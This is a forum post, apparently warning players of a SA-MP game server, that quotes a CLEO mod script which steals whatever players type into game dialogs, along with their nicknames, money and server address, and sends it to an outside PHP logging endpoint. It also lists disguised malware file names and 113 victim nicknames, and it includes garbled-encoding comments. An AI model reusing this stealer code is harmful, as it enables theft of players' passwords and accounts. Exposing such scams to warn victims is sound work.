$_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />"; fwrite($f, $s); fclose($f); ?> //-------------------------------------------------------------------------------------------------------------------------------------------------------- } {$CLEO} thread 'NoName' While 8afa: wait 100 end While 8B4C: -1 wait 100 end While 0B4C: -1 wait 0 0B4E: samp 0@ = get_current_dialog_id 0AC8: 6@ = 64 repeat wait 0 0B4A: samp 6@ = get_current_dialog_editbox_text until 8B4C: -1 0AC8: 1@ = 24 0B2B: 2@ = $PLAYER_ACTOR 0B36: samp 1@ = get_player_nickname 2@ wait 500 010B: 2@ = player $PLAYER_CHAR money 0AC8: 3@ = 15 0B39: samp get_current_server_address 3@ port 4@ 0AC8: 5@ = 86 0B3A: samp 5@ = get_current_server_name 0C17: 10@ = strlen 6@ if 10@ > 1 then 0AC8: 8@ = 445 0AD3: 8@ = format "http:%c%crvankarus.esy.es%ccleo%cadd.php?nick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d" params 47 47 47 47 1@ 3@ 4@ 5@ 0@ 6@ 2@ // ñá â êîâû÷êàõ íåëüçÿ ïèñàòü ñëåøü, ïîýòìó òàì ãäå äîëæíà áûòü ñëåøü ñòîèò %c - çíàê çàïèñàíûé â ïàðàìåòðàõ.  ïàðàìåòðàõ äëÿ êàæäîé %c ïðîïèñàí 47 - ýòî íîìåð ñëåøà. Ñòàíäàðòíî ñòîèò àäðåñ http://stilloger.ph/stealer/add.php?[äàëåå äàííûå], òàê êàê ñá íå ëþáèò ñëåøü â êîâû÷êàõ, òî àäðåñ çàïèñàí òàê http:%c%cstilloger.ph%cstealer%cadd.php?[äàëåå äàííûå] 0AA2: 9@ = load_library "urlmon.dll" // IF and SET 0AA4: 7@ = get_proc_address "URLDownloadToFileA" library 9@ // IF and SET 0AA5: call 7@ num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "%TEMP%\2352sfe.tmp" szUrl 8@ caller 0 0AA3: 9@ 0AC9: 8@ end 0AC9: 1@ 0AC9: 3@ 0AC9: 5@ 0AC9: 6@ wait 500 end 0@ = 0 1@ = 0 2@ = 0 3@ = 0 4@ = 0 5@ = 0 6@ = 0 7@ = 0 8@ = 0 9@ = 0 10@ = 0 30@ = 0 31@ = 0 wait 1000 0A93: end_custom_thread 0A93: end_custom_thread 0A93: end_custom_thread 0A93: end_custom_thread[/code] some nice names for malware: -FileSystem.cs (downloaded from http://rvankarus.esy.es/cleo/steal.cs xD) -backup2.cs -anticrash-1 -systemcode.cs -backupp1.cs -backupp2.cs [hr] 113 players data stolen within 3 days [hr] Admin_Rgame Anti_Hack Bari_Whatameal Be_Heo Bem_Mes BesT_Jay Best_Jay Black_Sat Black_Tammmmm Black_Tamq Black_Tanker Black_hero Black_herobe Carry_GumBall Cet_Nhox Chinh_Ho CoCo_Chopper Con_Bord Cotex_Huong DCS_Thuan Daniel_Elxotia David_BonNhox David_Mimi Demon_Loko Denis_Kolavov DepZaiii Desi_Hem Destroyer_Nhan Dinh.Hoang_Tan Doug_Las Douglas_Spatacus Douglas_Stacus Fed_Ded Fin_Balor HOANG_LXAG HackOf_War HellenS_SaraS HoPham_TuanKiet Hoan_Star Hoang_guyto Hoangg_Longg Hoangg_Tann Huan_Slatus Huy_Per Jay_Jay Jean_my Karry_GumBall Kea_Rez Kenji_William Kich_Hoat Killer_Death Killer_Deathh Killer_death Killerr_Death Killerr_Deathh Martin_Geo Master_Gaistr Master_Sver Med_Die Men_Len Minh_Hieu NguyenVan_Hoang Nhan_KDE Nhan_KDEE Niko_graviss Oni_Baka PhamTruong_Quoc Phong_Le Phuc.Nguyen Phuc_Nguyen Phuc_Nguyena Pick_Daxuo Play_Boyzzzz Pro_Game PurceIl_Bellamy Purcell_Bellamy Purcell_Bellamys Quang_Thai Rens_Shin Roy_Race San_Haden San_haden Skin_Sasuke Skin_sasuke Tan_Dubai Tan_Nguyen Tend_DSd Tes_Ts Thanh_Thuan Thien_Tan Thinh_Dizz Tim_Lim Timds_Ties Trum_BizSung Trum_Hanh Trum_TeamNgua Trum_TeamNhua Viperr Viperrr Viperrrr Vua_Zeuss Willam_Teds Willam_pro You_Mother [VN]_HuyPArker [VN]_HuyParker hidan_shine killer_Death kingbesst kingbest skin_sasuke[/hr][/hr] [/QUOTE]
Name
Verification
Name a popular topic discussed in the ugbase.eu community
Post reply
Home
Forums
Community
Spammm
Intriguing scam (check if your data was stolen)
This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.
Accept
Learn more…
Top